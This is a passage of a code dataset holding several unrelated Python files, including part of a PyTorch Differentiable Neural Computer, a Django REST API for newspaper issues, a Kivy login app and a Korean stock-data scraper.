eps)\n\n #Weighted softmax as in paper.\n transformed_strengths = self._strength_op(strengths).unsqueeze(-1)\n\n sharp_activations = activations * transformed_strengths\n result = self.softmax(sharp_activations)\n assert list(result.size())[1] == self._num_heads\n return result\n\n\nclass DNCMemory(nn.Module):\n def __init__(self, word_size=32, memory_size=100, num_reads=1, write_heads=1, batch_size=32):\n super(DNCMemory, self).__init__()\n self.W = word_size\n self.N = memory_size\n self.mem_size = memory_size\n self.word_size = word_size\n self.num_reads = num_reads\n self.num_writes = write_heads\n self.batch_size = batch_size\n\n self.softplus = nn.Softplus()\n self.sigmoid = nn.Sigmoid()\n\n self._read_content_wght = WeightFn(word_size=word_size, num_heads=num_reads)\n self._write_content_wght = WeightFn(word_size=word_size, num_heads=write_heads)\n\n 
self._linkage = Linkage(memory_size=memory_size, num_writes=write_heads)\n self._usage = Usage(memory_size)\n\n def allocation(self, usage):\n \"\"\"Computes allocation by sorting `usage`\n\n This corresponds to the value a = a_t[phi_t[j]] in the paper.\n\n Args:\n usage: tensor of shape `[batch_size, memory_size]` indicating current\n memory usage. This is equal to u_t in the paper when we only have one\n write head, but for multiple write heads, one should update the usage\n while iterating through the write heads to take into account the\n allocation returned by this function.\n\n Returns:\n Tensor of shape `[batch_size, memory_size]` corresponding to allocation.\n \"\"\"\n # usage => [batch_size, memory_size]\n # Ensure values are not too small prior to cumprod.\n usage = eps + (1 - eps) * usage\n nonusage = 1 - usage\n\n sorted_nonusage, indices = nonusage.sort(-1, descending=True)\n _, perms = indices.sort(-1)\n\n sorted_usage = 1 - sorted_nonusage\n ones_ = Variable(torch.ones(usage.size(0), 1))\n x_base = torch.cat([ones_, sorted_usage], -1)\n\n prod_sorted_usage = x_base.cumprod(-1)\n sorted_allocation = sorted_nonusage * prod_sorted_usage[:, :-1]\n indexed = sorted_allocation.gather(-1, perms)\n\n return indexed\n\n\n def write_allocation_weights(self, usage, write_gates):\n \"\"\"Calculates freeness-based locations for writing to\n\n This finds unused memory by ranking the memory locations by usage, for each\n write head. (For more than one write head, we use a \"simulated new usage\"\n which takes into account the fact that the previous write head will increase\n the usage in that area of the memory.)\n\n Args:\n usage: A tensor of shape `[batch_size, memory_size]` representing\n current memory usage.\n write_gates: A tensor of shape `[batch_size, num_writes]` with values in\n the range [0, 1] indicating how much each write head does writing\n based on the address returned here (and hence how much usage\n increases).\n num_writes: The number of write heads to calculate write weights for.\n\n Returns:\n tensor of shape `[batch_size, num_writes, memory_size]` containing the\n freeness-based write locations. 
Note that this isn't scaled by\n `write_gate`; this scaling must be applied externally.\n \"\"\"\n\n # expand gatings over memory locations\n write_gates = write_gates.unsqueeze(-1)\n\n allocation_weights = []\n for i in range(self.num_writes):\n #########################################################\n allocation_weights.append(self.allocation(usage))\n #########################################################\n # update usage to take into account writing to this new allocation\n usage += ((1 - usage) * write_gates[:, i, :] * allocation_weights[i])\n\n # Pack the allocation weights for the write heads into one tensor.\n return torch.stack(allocation_weights, dim=1)\n\n\n def _write_weights(self, inputs, memory, usage):\n \"\"\"Calculates the memory locations to write to.\n\n This uses a combination of content-based lookup and finding an unused\n location in memory, for each write head.\n\n Args:\n inputs: Collection of inputs to the access module, including controls for\n how to chose memory writing, such as the content to look-up and the\n weighting between content-based and allocation-based addressing.\n\n memory: A tensor of shape `[batch_size, memory_size, word_size]`\n containing the current memory contents.\n usage: Current memory usage, which is a tensor of shape `[batch_size, memory_size]`,\n used for allocation-based addressing.\n\n Returns:\n tensor of shape `[batch_size, num_writes, memory_size]` indicating where\n to write to (if anywhere) for each write head.\n \"\"\"\n\n alloc_gate, write_str, write_key, write_gate = inputs\n # c_t^{w, i} - The content-based weights for each write head.\n write_contnt_wghts = self._write_content_wght([memory, write_key, write_str])\n\n # a_t^i - The allocation weights for each write head.\n write_alloc_wghts = self.write_allocation_weights(usage, write_gate)\n\n assert list(memory.size()) == [self.batch_size, self.mem_size, self.word_size]\n assert list(write_contnt_wghts.size()) == [self.batch_size, self.num_writes, self.mem_size]\n assert list(write_alloc_wghts.size()) == [self.batch_size, self.num_writes, self.mem_size]\n\n # Expands gates over memory locations.\n alloc_gate = alloc_gate.unsqueeze(-1)\n write_gate = write_gate.unsqueeze(-1)\n\n # w_t^{w, i} - The write weightings for each write head.\n result = write_gate * (alloc_gate * write_alloc_wghts +\n (1 - alloc_gate) * write_contnt_wghts)\n\n assert list(result.size()) == [self.batch_size, self.num_writes, self.mem_size]\n return result\n\n def directional_read_weights(self, link, prev_read_weights):\n \"\"\"Calculates the forward or the backward read weights.\n\n For each read head (at a given address), there are `num_writes` link graphs\n to follow. 
Thus this function computes a read address for each of the\n        `num_reads * num_writes` pairs of read and write heads.\n\n        Args:\n          link:\n            tensor-shape `[batch_size, num_writes, memory_size, memory_size]`\n            representing the link graphs L_t.\n          prev_read_weights:\n            tensor-shape `[batch_size, num_reads, memory_size]`\n            containing the previous read weights w_{t-1}^r.\n          forward: Boolean indicating whether to follow the \"future\" direction in\n            the link graph (True) or the \"past\" direction (False).\n\n        Returns:\n          tensor of shape `[batch_size, num_reads, num_writes, memory_size]`\n        \"\"\"\n        # We calculate the forward and backward directions for each pair of\n        # read and write heads; hence we need to tile the read weights and do a\n        # sort of \"outer product\" to get this.\n        expanded_read_weights = torch.stack([prev_read_weights] * self.num_writes, 1)\n        result = expanded_read_weights.bmm(link)\n        # Swap dimensions 1, 2 so order is [batch, reads, writes, memory]:\n        return result.permute(0, 2, 1, 3)\n\n    def _read_weights(self, inputs, memory, prev_read_weights, link):\n        \"\"\"Calculates read weights for each read head.\n\n        The read weights are a combination of following the link graphs in the\n        forward or backward directions from the previous read position, and doing\n        content-based lookup. The interpolation between these different modes is\n        done by `inputs['read_mode']`.\n\n        Args:\n          inputs: Controls for this access module. This contains the content-based\n            keys to lookup, and the weightings for the different read modes.\n\n          memory: A tensor of shape `[batch_size, memory_size, word_size]`\n            containing the current memory contents to do content-based lookup.\n\n          prev_read_weights: A tensor `[batch_size, num_reads, memory_size]`\n            containing the previous read locations.\n\n          link: A tensor `[batch_size, num_writes, memory_size, memory_size]`\n            containing the temporal write transition graphs.\n\n        Returns:\n          A tensor of shape `[batch_size, num_reads, memory_size]` containing the\n          read weights for each read head.\n        \"\"\"\n        read_keys, read_str, read_modes = inputs\n        \n        assert list(memory.size()) == [self.batch_size, self.mem_size, self.word_size]\n        assert list(prev_read_weights.size()) == [self.batch_size, self.num_reads, self.mem_size]\n        assert list(link.size()) == [self.batch_size, self.num_writes, self.mem_size, self.mem_size]\n\n        # c_t^{r, i} - The content weightings for each read head.\n        content_weights = self._read_content_wght([memory, read_keys, read_str])\n        assert list(content_weights.size()) == [self.batch_size, self.num_reads, self.mem_size]\n\n        forward_weights = prev_read_weights.unsqueeze(1).matmul(link)\n        backwrd_weights = prev_read_weights.unsqueeze(1).matmul(link.transpose(2, 3))\n\n        forward_weights = forward_weights.permute(0, 2, 1, 3)\n        backwrd_weights = backwrd_weights.permute(0, 2, 1, 3)\n\n        backward_mode = read_modes[:, :, 0]\n        forward_mode = read_modes[:, :, 1]\n        content_mode = read_modes[:, :, 2]\n\n        content_str = content_mode.unsqueeze(2) * content_weights\n        forward_str = (forward_mode.unsqueeze(2).unsqueeze(2) * forward_weights).sum(2)\n        # Fix: the backward term must use the backward-direction weights computed\n        # above; the original multiplied forward_weights twice and never used them.\n        backwrd_str = (backward_mode.unsqueeze(2).unsqueeze(2) * backwrd_weights).sum(2)\n        res = content_str + forward_str + backwrd_str\n        assert list(res.size()) == [self.batch_size, self.num_reads, self.mem_size]\n        return res\n\n    def _erase_and_write(self, memory, address, erase_vec, values):\n        \"\"\"Module to erase and write in the external memory.\n\n        Erase operation:\n        M_t'(i) = M_{t-1}(i) * (1 - w_t(i) * e_t)\n\n        Add operation:\n        M_t(i) = M_t'(i) + 
w_t(i) * a_t\n\n where e are the erase_vec, w the write weights and a the values.\n\n Args:\n memory: 3-D tensor of `[batch_size, memory_size, word_size]`.\n address: 3-D tensor `[batch_size, num_writes, memory_size]`.\n erase_vec: 3-D tensor `[batch_size, num_writes, word_size]`.\n values: 3-D tensor `[batch_size, num_writes, word_size]`.\n\n Returns:\n 3-D tensor of shape `[batch_size, num_writes, word_size]`.\n \"\"\"\n assert list(memory.size()) == [self.batch_size, self.mem_size, self.word_size]\n assert list(address.size()) == [self.batch_size, self.num_writes, self.mem_size]\n assert list(erase_vec.size()) == [self.batch_size, self.num_writes, self.word_size]\n assert list(values.size()) == [self.batch_size, self.num_writes, self.word_size]\n\n expand_address = address.unsqueeze(3)\n erase_vec = erase_vec.unsqueeze(2)\n\n weighted_resets = expand_address * erase_vec\n weighted_resets = 1 - weighted_resets\n reset_gate = weighted_resets.prod(1)\n memory = memory * reset_gate\n\n add_matrix = address.transpose(1, 2).bmm(values)\n memory += add_matrix\n return memory\n\n def forward(self, inputs, prev_state):\n \"\"\" forward\n \"\"\"\n\n [read_keys, read_str, write_key, write_str,\n erase_vec, write_vec, free_gates, alloc_gate, write_gate, read_modes] = inputs\n\n prev_memory, prev_read_wghts, prev_write_weights, prev_linkage, prev_usage = prev_state\n assert list(prev_memory.size()) == [self.batch_size, self.N, self.W]\n\n # forward pass\n # 1 Update usage using 'free_gate' and previous read & write weights.\n usage = usage = self._usage(prev_write_weights, free_gates, prev_read_wghts, prev_usage)\n\n # 2 Get Write weights\n write_inputs = [alloc_gate, write_str, write_key, write_gate]\n write_weights = self._write_weights(write_inputs, prev_memory, usage)\n\n # 3 Write to memory.\n memory = self._erase_and_write(prev_memory, write_weights, erase_vec, write_vec)\n\n # 4 update linkage\n linkage_state = self._linkage(write_weights, prev_linkage)\n links, _ = linkage_state\n\n #############\n # 5 read from memory\n read_inputs = [read_keys, read_str, read_modes]\n read_weights = self._read_weights(read_inputs, memory, prev_read_wghts, links)\n #############\n # 6 read memory\n read_words = read_weights.matmul(memory)\n\n return (read_words,\n (memory, read_weights, write_weights, linkage_state, usage))\n\n\nclass InterFace(nn.Module):\n def __init__(self, word_size=32, num_reads=1, write_heads=1):\n super(InterFace, self).__init__()\n self.word_size = word_size\n self.num_reads = num_reads\n self.num_writes = write_heads\n self.batch_softmax = BatchSoftmax()\n self.softplus = nn.Softplus()\n self.sigmoid = nn.Sigmoid()\n\n def _chunk1(self, inputs, dim1, activation=None):\n output = inputs[:, :dim1]\n rest = inputs[:, dim1:]\n if activation is not None:\n output = activation(output)\n return output, rest\n\n def _chunk2(self, inputs, dim1, dim2, activation=None):\n num = dim2 * dim1\n output = inputs[:, 0:num]\n rest = inputs[:, num:]\n output = output.contiguous().view(-1, dim1, dim2)\n if activation is not None:\n output = activation(output)\n return output, rest\n\n def chunk(self, inputs, dim, activation=None):\n if len(dim) == 1:\n return self._chunk1(inputs, dim[0], activation)\n else:\n dim1, dim2 = dim\n return self._chunk2(inputs, dim1, dim2, activation)\n\n def forward(self, inputs):\n read_keys, rest = self.chunk(inputs, [self.num_reads, self.word_size])\n read_strn, rest = self.chunk(rest, [self.num_reads])\n\n write_key, rest = self.chunk(rest, [self.num_writes, 
self.word_size])\n write_str, rest = self.chunk(rest, [self.num_writes])\n\n # e_t^i - Amount to erase the memory by before writing, for each write head.\n erase_vec, rest = self.chunk(rest, [self.num_writes, self.word_size], self.sigmoid)\n # v_t^i - The vectors to write to memory, for each write head `i`.\n write_vec, rest = self.chunk(rest, [self.num_writes, self.word_size])\n\n\n # f_t^j - Amount that the memory at the locations read from at the previous\n # time step can be declared unused, for each read head `j`.\n free_gates, rest = self.chunk(rest, [self.num_reads], self.sigmoid)\n # g_t^{a, i} - Interpolation between writing to unallocated memory and\n # content-based lookup, for each write head `i`. Note: `a` is simply used to\n # identify this gate with allocation vs writing (as defined below).\n alloc_gate, rest = self.chunk(rest, [self.num_writes], self.sigmoid)\n # g_t^{w, i} - Overall gating of write amount for each write head.\n write_gate, rest = self.chunk(rest, [self.num_writes], self.sigmoid)\n\n # \\pi_t^j - Mixing between \"backwards\" and \"forwards\" positions (for\n # each write head), and content-based lookup, for each read head.\n read_modes, _ = self.chunk(rest, [self.num_reads, 3], self.batch_softmax)\n\n return [read_keys, read_strn, write_key, write_str,\n erase_vec, write_vec, free_gates, alloc_gate,\n write_gate, read_modes]\n\nclass InterFace_Stateful(nn.Module):\n def __init__(self, word_size=32, num_reads=1, write_heads=1):\n super(InterFace, self).__init__()\n self.word_size = word_size\n self.num_reads = num_reads\n self.num_writes = write_heads\n self.batch_softmax = BatchSoftmax()\n self.softplus = nn.Softplus()\n self.sigmoid = nn.Sigmoid()\n self.read_key = nn.Linear(num_reads * word_size, )\n\n def _chunk1(self, inputs, dim1, activation=None):\n output = inputs[:, :dim1]\n rest = inputs[:, dim1:]\n if activation is not None:\n output = activation(output)\n return output, rest\n\n def _chunk2(self, inputs, dim1, dim2, activation=None):\n num = dim2 * dim1\n output = inputs[:, 0:num]\n rest = inputs[:, num:]\n output = output.contiguous().view(-1, dim1, dim2)\n if activation is not None:\n output = activation(output)\n return output, rest\n\n def chunk(self, inputs, dim, activation=None):\n if len(dim) == 1:\n return self._chunk1(inputs, dim[0], activation)\n else:\n dim1, dim2 = dim\n return self._chunk2(inputs, dim1, dim2, activation)\n\n def forward(self, inputs):\n read_keys, rest = self.chunk(inputs, [self.num_reads, self.word_size])\n read_strn, rest = self.chunk(rest, [self.num_reads])\n\n write_key, rest = self.chunk(rest, [self.num_writes, self.word_size])\n write_str, rest = self.chunk(rest, [self.num_writes])\n\n # e_t^i - Amount to erase the memory by before writing, for each write head.\n erase_vec, rest = self.chunk(rest, [self.num_writes, self.word_size], self.sigmoid)\n # v_t^i - The vectors to write to memory, for each write head `i`.\n write_vec, rest = self.chunk(rest, [self.num_writes, self.word_size])\n\n\n # f_t^j - Amount that the memory at the locations read from at the previous\n # time step can be declared unused, for each read head `j`.\n free_gates, rest = self.chunk(rest, [self.num_reads], self.sigmoid)\n # g_t^{a, i} - Interpolation between writing to unallocated memory and\n # content-based lookup, for each write head `i`. 
Note: `a` is simply used to\n # identify this gate with allocation vs writing (as defined below).\n alloc_gate, rest = self.chunk(rest, [self.num_writes], self.sigmoid)\n # g_t^{w, i} - Overall gating of write amount for each write head.\n write_gate, rest = self.chunk(rest, [self.num_writes], self.sigmoid)\n\n # \\pi_t^j - Mixing between \"backwards\" and \"forwards\" positions (for\n # each write head), and content-based lookup, for each read head.\n read_modes, _ = self.chunk(rest, [self.num_reads, 3], self.batch_softmax)\n\n return [read_keys, read_strn, write_key, write_str,\n erase_vec, write_vec, free_gates, alloc_gate,\n write_gate, read_modes]\n\n\n\nclass DNC(nn.Module):\n def __init__(self, batch_size=32, memory_size=100, word_len=6,\n output_size=None, stateful=False, debug=False,\n num_layers=2, hidden_size=4, num_read_heads=1, **kwdargs):\n super(DNC, self).__init__()\n\n self.word_len = word_len\n self.num_read_heads = num_read_heads\n self.interface_size = num_read_heads * word_len + 3 * word_len + 5 * num_read_heads + 3\n if output_size is not None:\n self.output_size = output_size\n else:\n self.output_size = word_len\n\n if stateful == True:\n print(\"x\")\n self._interface = InterFace(word_size=word_len,\n num_reads=num_read_heads,\n write_heads=1)\n self._controller = Controller(word_size=word_len,\n input_size=self.output_size + word_len * num_read_heads,\n num_reads=num_read_heads,\n hidden_size=hidden_size,\n num_layers=num_layers,\n output_size=self.interface_size + word_len,\n batch_size=batch_size)\n self._memory = DNCMemory(word_size=word_len,\n memory_size=memory_size,\n batch_size=batch_size,\n num_reads=num_read_heads)\n self.nn_output = nn.Linear(self.interface_size + word_len + num_read_heads * word_len, self.output_size)\n\n @property\n def memory(self):\n return self._memory\n\n def forward(self, inputs, previous_state):\n \"\"\"\n `input` [batch_size, seq_len, word_size]\n `access_output`\n `[batch_size, num_reads, word_size]` containing read words.\n access output_size =\n `access_state` is a tuple of the access module's state\n memory, [memory_size, word_size]\n read_weights, W r [batch_size, num_reads, memory_size]\n write_weights, W [batch_size, num_writes, memory_size]\n linkage_state, L\n links [batch_size, num_writes, memory_size, memory_size]\n precedence_wghts [batch_size, num_writes, memory_size]\n usage, F\n `controller_state` []\n :tuple of controller module's state\n\n \"\"\"\n prev_access_output, prev_access_state, prev_control_state = previous_state\n prev_access_output = prev_access_output.view(-1, self.num_read_heads * self.word_len)\n\n control_input = torch.cat([inputs, prev_access_output], 1)\n\n controll_output, controller_state = self._controller(control_input, prev_control_state)\n interface_output = self._interface(controll_output)\n\n access_output, access_state = self._memory(interface_output, prev_access_state)\n access_output = access_output.view(-1, self.word_len * self.num_read_heads)\n\n output = torch.cat([controll_output, access_output], 1)\n\n output = self.nn_output(output)\n\n return output, [access_output, access_state, controller_state]\n\n\n\n\ndef content_addressed_lookup(k):\n #F.cosine_similarity()\n pass\n\ndef start_state(num_layers=2, word_len=4, num_read_heads=1, memory_size=100,\n batch_size=8, hidden_size=64, **kwdargs):\n \"\"\" prev_state: A `DNCState` tuple containing the fields\n `access_output` `[batch_size, num_reads, word_size]` containing read words.\n `access_state` is a tuple of the access 
module's state\n `controller_state` is a tuple of controller module's state\n \"\"\"\n num_writes = 1\n\n access_output = Variable(torch.zeros(batch_size, num_read_heads, word_len), requires_grad=True)\n memory = [Variable(torch.zeros(batch_size, memory_size, word_len), requires_grad=True), #memory\n Variable(torch.zeros(batch_size, num_read_heads, memory_size), requires_grad=True), #read_weights\n Variable(torch.zeros(batch_size, num_writes, memory_size), requires_grad=True), #write weights\n [Variable(torch.zeros(batch_size, num_writes, memory_size, memory_size), requires_grad=True),\n Variable(torch.zeros(batch_size, num_writes, memory_size), requires_grad=True)], #linkage\n Variable(torch.ones(batch_size, memory_size), requires_grad=True) #usage\n ]\n hidden = [Variable(torch.zeros(num_layers, batch_size, hidden_size), requires_grad=True),\n Variable(torch.zeros(num_layers, batch_size, hidden_size), requires_grad=True)]\n return [access_output, memory, hidden]\n\n\n\n\ndef one_hot(x):\n pass\n\n\"\"\"w_t -> write weights, e_t\"\"\"\n\n\ndef controller_output(input_x, input_R):\n return input_x + input_R\n\ndef run_dnc(batch_size=32):\n data_gen = gen.RandomData()\n loader = DataLoader(data_gen, batch_size=batch_size)\n dnc = DNC(batch_size=32)\n for i, (trgt, label) in enumerate(loader):\n #output = dnc(trgt)\n pass\n\n\n\"\"\"\n read_keys_k_t = \n read_weights = \n write_keys_k_t =\n write_str_B_t = \n erase_vec_e_t = \n write_vec_v_t = \n free_gates_f_t =\n allocation_gate_g_t =\n write_gate_g_t = \n read_modes_R = \n \"\"\"\n\nif __name__ == \"__main__\":\n print(\"x\")\n","sub_path":"old/dnc_stateful.py","file_name":"dnc_stateful.py","file_ext":"py","file_size_in_byte":35597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"63706324","text":"''' CHECK IF THE GIVEN NUMBER IS DIVISILE BY ANY NUMBER LESS THAN N OTHER THAN 1 '''\nnum=int(input())\na=0\nfor i in range(2,num):\n if(num%i==0):\n a=1\nif(a==1):\n print('yes')\nelse:\n print('no')\n","sub_path":"Check_N_Divisible_by_Less_than_N.py","file_name":"Check_N_Divisible_by_Less_than_N.py","file_ext":"py","file_size_in_byte":198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"378179376","text":"#!/usr/bin/python3\n\"\"\"Module to send a POST request to the passed URL\n with the email, and displays the body of the response\n\"\"\"\n\nfrom urllib import request, parse\nfrom sys import argv\n\nif __name__ == \"__main__\":\n value = {'email': argv[2]}\n data = parse.urlencode(value).encode(\"utf-8\")\n\n with request.urlopen(argv[1], data) as response:\n page = response.read().decode(\"utf-8\")\n print(page)\n","sub_path":"0x11-python-network_1/2-post_email.py","file_name":"2-post_email.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"164281853","text":"from rest_framework import filters, pagination, serializers, viewsets\nfrom url_filter.integrations.drf import DjangoFilterBackend\n\nfrom apps.issues.models import Issue, PrintIssue\nfrom utils.serializers import AbsoluteURLField\n\n\nclass NestedPDFSerializer(serializers.ModelSerializer):\n\n cover = AbsoluteURLField(source='get_cover_page')\n\n class Meta:\n model = PrintIssue\n fields = [\n 'url',\n 'pages',\n 'cover',\n 'pdf',\n ]\n\n\nclass IssueSerializer(serializers.HyperlinkedModelSerializer):\n \"\"\"ModelSerializer for Issue\"\"\"\n\n pdfs = NestedPDFSerializer(\n 
many=True,\n read_only=True,\n )\n\n class Meta:\n model = Issue\n fields = [\n 'id',\n 'url',\n 'publication_date',\n 'year',\n 'issue_name',\n 'pdfs',\n 'issue_type',\n ]\n\n\nclass LargeLimitPagination(pagination.LimitOffsetPagination):\n default_limit = 1000\n\n\nclass IssueViewSet(viewsets.ModelViewSet):\n \"\"\" API endpoint that allows Issue to be viewed or updated. \"\"\"\n\n filter_fields = ['id', 'publication_date', 'pdfs']\n queryset = Issue.objects.all().prefetch_related('pdfs')\n serializer_class = IssueSerializer\n pagination_class = LargeLimitPagination\n filter_backends = (\n filters.OrderingFilter, filters.SearchFilter, DjangoFilterBackend\n )\n search_fields = ['issue_name']\n\n\nclass PrintIssueSerializer(serializers.HyperlinkedModelSerializer):\n \"\"\"ModelSerializer for PrintIssue\"\"\"\n\n cover = AbsoluteURLField(source='get_cover_page.url')\n\n class Meta:\n model = PrintIssue\n fields = [\n 'url',\n 'issue',\n 'pages',\n 'cover',\n 'pdf',\n ]\n\n\nclass PrintIssueViewSet(viewsets.ModelViewSet):\n \"\"\" API endpoint that allows PrintIssue to be viewed or updated. \"\"\"\n\n queryset = PrintIssue.objects.order_by('-issue__publication_date')\n serializer_class = PrintIssueSerializer\n filter_backends = (filters.SearchFilter, DjangoFilterBackend)\n","sub_path":"django/api/issues.py","file_name":"issues.py","file_ext":"py","file_size_in_byte":2096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"586551290","text":"from utility_func import *\nfrom PIL import Image\nimport numpy as np\nfrom torch import optim,nn\n\nimport argparse\nparser=argparse.ArgumentParser(description='Prediction options')\nparser.add_argument('image_path',type=str,help='images path')\nparser.add_argument('--device',type=str,default=\"cuda\",help='cuda or cpu (default: cuda)')\nparser.add_argument('path_chk',type=str,help='checkpoint path')\nparser.add_argument('--top_k',type=int,default=5,help='number of most likely classes(default: 5)')\nparser.add_argument('--cat_to_name',type=str,default='',help='json file giving corresponding name for classes')\nargs = parser.parse_args()\ndevice = torch.device(args.device if torch.cuda.is_available() else \"cpu\")\ndef predict(image_path, model, topk,device,cat_to_name_path):\n model.eval()\n image_prepo=process_image(Image.open(image_path)).to(device)\n dictio={v: k for k, v in model.class_to_idx.items()}\n with torch.no_grad():\n logresult = model.forward(image_prepo.unsqueeze(0))\n result=torch.exp(logresult)\n legends=[dictio[x] for x in np.array(torch.topk(result,topk,dim=1)[1][0])]\n \n #legends=legends[::-1]\n proba=[x for x in np.array(torch.topk(result,topk,dim=1)[0][0])]\n #proba=proba[::-1]\n longuer=max(len(l) for l in legends)+5\n print(\"\\nThe top {} classes and their probability :\\n\".format(topk))\n for x in range(topk):\n print(\"{} : {:.4%}\".format(legends[x].ljust(longuer),proba[x]))\n \ndef Make_a_pred(image_path,ch_path,topk,device,cat_to_name):\n criterion = nn.NLLLoss() \n current_epoch,Model,optimizer,loss,criterion,input_lay,name_mod=loading_ck(ch_path,criterion,device)\n Model.to(device)\n predict(image_path,Model,topk,device,cat_to_name)\n \nMake_a_pred(args.image_path,args.path_chk + \".pth\",args.top_k,args.device,args.cat_to_name + \".json\")\n \n ","sub_path":"dog-breed-identification/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":1909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} 
+{"seq_id":"115448969","text":"from kivy.app import App\nfrom kivy.lang.builder import Builder\nfrom kivy.uix.screenmanager import ScreenManager, Screen\nfrom kivy.core.window import Window\n\n#LISTA PARA SALVAR OS CADASTRO\nlogin = ['admin123','admin']\nuser = []\n\nkv =Builder.load_file('maintela.kv')\n\n'''================ TELAS ==================='''\n\nclass TelaLogin(Screen):\n\n    def cadastroBT(self):\n        sm.current = 'cadastro'\n\n    def loginBT(self):\n        email = self.ids.email.text\n        senha = self.ids.senha.text\n\n        if email in login and senha in login:\n            sm.current = 'escolha'\n\nclass TelaCadastro(Screen):\n\n    def finalizarBT(self):\n        email = self.ids.email.text\n        usuario = self.ids.usuario.text\n        senha = self.ids.senha.text\n\n        login.append(email)\n        login.append(senha)\n        user.append(usuario)\n\n        sm.current = 'login'\n\n    def voltarBT(self):\n        self.ids.email.text = ''\n        self.ids.usuario.text = ''\n        self.ids.senha.text = ''\n        sm.current = 'login'\n\nclass TelaEscolha(Screen):\n    pass\n\n'''============= SCREEN MANAGER ============'''\n\nclass ControleTela(ScreenManager):\n    pass\n\nsm = ControleTela()\n\njanela = [TelaLogin(name='login'),\n          TelaCadastro(name='cadastro'),\n          TelaEscolha(name='escolha')]\n\nfor janela in janela:\n    sm.add_widget(janela)\n#DEFINE A TELA QUE IRÁ APARECER QUADNO O APP ABRE\nsm.current = \"login\"\n\n'''=============== CLASSE BASE ==============='''\nWindow.size = 300,600\nclass MainApp(App):\n    def build(self):\n        return sm\n\nif __name__ == '__main__':\n    MainApp().run()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"413384004","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom os import walk, listdir\nimport pandas as pd\nfrom time import time\n\ndef read_tram(tram_file='tram/tramwaje.xlsx'):\n\n    df = pd.io.parsers.read_csv(tram_file)\n    # df = pd.read_excel(tram_file)\n    return df\n\nf = []\nfor (_, __, filenames) in walk('tram_csv'):\n    f.extend(filenames)\n    break\n\n\n#files = listdir('2017_goog_drv')\n\nt1 = time()\ntrams = pd.DataFrame() #\nfor f_ in f:\n    trams = trams.append(read_tram('tram_csv/'+f_))\n    #trams = read_tram('tram_csv/' + f_)\n\n\nprint(time()-t1) # 2 min / csv => 5s\n\nlines = np.sort(trams['FirstLine'].unique())\n\nlowFloor = []\nfor line in lines:\n    trams_line = trams[trams.FirstLine == line]\n    print(f_)\n    print(trams_line.shape[0])\n    lf = trams_line[trams_line.LowFloor == 1].shape[0] / trams_line.shape[0] * 100\n    lowFloor.append(lf)\n\n\nx_ax = range(1, len(lines)+1)\nplt.rcParams[\"figure.figsize\"] = 8, 5\nplt.bar(x_ax, lowFloor, align='center', color='c')\nplt.title(\"Udział pojazdów niskopodłogowych\")\nplt.xlabel('Linia')\nplt.ylabel('% tramwajów niskopodłogowych')\nplt.xticks(x_ax, lines)\nplt.savefig(\"niskopodlogowe.png\")\nplt.show()\n\n","sub_path":"wykresy.py","file_name":"wykresy.py","file_ext":"py","file_size_in_byte":1154,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"117815600","text":"#!/usr/bin/python\nimport requests\nimport datetime\nimport pandas as pd\nfrom pandas import DataFrame\nimport io, os\n# user define package import\nimport sys\nsys.path.append(\"../../favis\")\nfrom msgbot.favisbot import favisbot\nimport util.krx_util as util\nimport util.favis_util as favis\nimport pymysql\n\nconn = favis.get_favis_mysql_connection()\ncur = conn.cursor()\ndf_sm = pd.read_sql_query('SELECT * FROM stock_info', 
conn)\n\nprint (datetime.datetime.strftime(datetime.datetime.now(), '%Y-%m-%d %H:%M:%S'))\nfor idx, row in df_sm.iterrows():\n\tstock_code = row['code']\n\tstock_name = row['name']\n\t#print (row['code'], util.getIsinCode(row['code']))\n\n\tyear_start = 2010\n\tyear_end = 2016\n\tfor year in range(year_start, year_end + 1):\n\t\tprint(stock_code, stock_name, year)\n\t\tstart = datetime.datetime(year, 1, 1).strftime('%Y%m%d')\n\t\tend = datetime.datetime(year, 12, 31).strftime('%Y%m%d')\n\n\t\tisu_cd = util.getIsinCode(stock_code)\n\n\t\tpath = \"./data/\"\n\t\tfilename = path + stock_code + \"_\" + start + \"-\" + end + \"-trend.xls\"\n\t\tif not os.path.exists(filename):\n\t\t\tr = util.get_krx_daily_sellbuy_trend(isu_cd, start, end)\n\t\t\twith open(filename, 'wb') as f:\n\t\t\t\t#f.write(r.content.decode('utf-8'))\n\t\t\t\tf.write(r)\n\n\n\t\t#df = pd.read_excel(filename, thousands=',', usecols=['년/월/일', '종가','대비','거래량(주)','기관_순매수(주)','외국인_순매수(주)'])\n\t\tdf = pd.read_excel(filename, thousands=',', usecols=['년/월/일', '기관_순매수(주)','외국인_순매수(주)'])\n\t\tdf = df.dropna()\n\t\tdf.columns = ['date','i_volume', 'f_volume']\n\t\t# df['date'] = pd.to_datetime(df['date'], format='%Y-%m-%d')\n\t\tdf['date'] = df['date'].str.replace('/','')\n\t\tdf_cp = df[['date','i_volume', 'f_volume']].copy()\n\t\tdf_cp['stock_code'] = stock_code\n\t\t# print(df_cp)\n\n\t\tdf_cp = df_cp[['stock_code', 'date','i_volume', 'f_volume']]\n\t\tfor idx, row in df_cp.iterrows():\n\t\t\ttry:\n#\t\t\tcur.executemany('INSERT INTO daily_info (code, date, open, high, low, close, volume, marcap, amount) ' \\\n#\t\t\t\t\t\t'VALUES(%s,%s,%s,%s,%s,%s,%s,%s,%s)', data)\n\t\t\t\tcur.execute('INSERT INTO trading_trend (code, date, foreigner, institution) ' \\\n\t\t\t\t\t\t\t'VALUES(%s,%s,%s,%s)', (row['stock_code'], row['date'], row['f_volume'], row['i_volume']))\n\t\n\t\t\t\tconn.commit()\n\t\t\texcept pymysql.IntegrityError:\n\t\t\t\tpass\n\t\t\texcept pymysql.Error as e:\n\t\t\t\tif 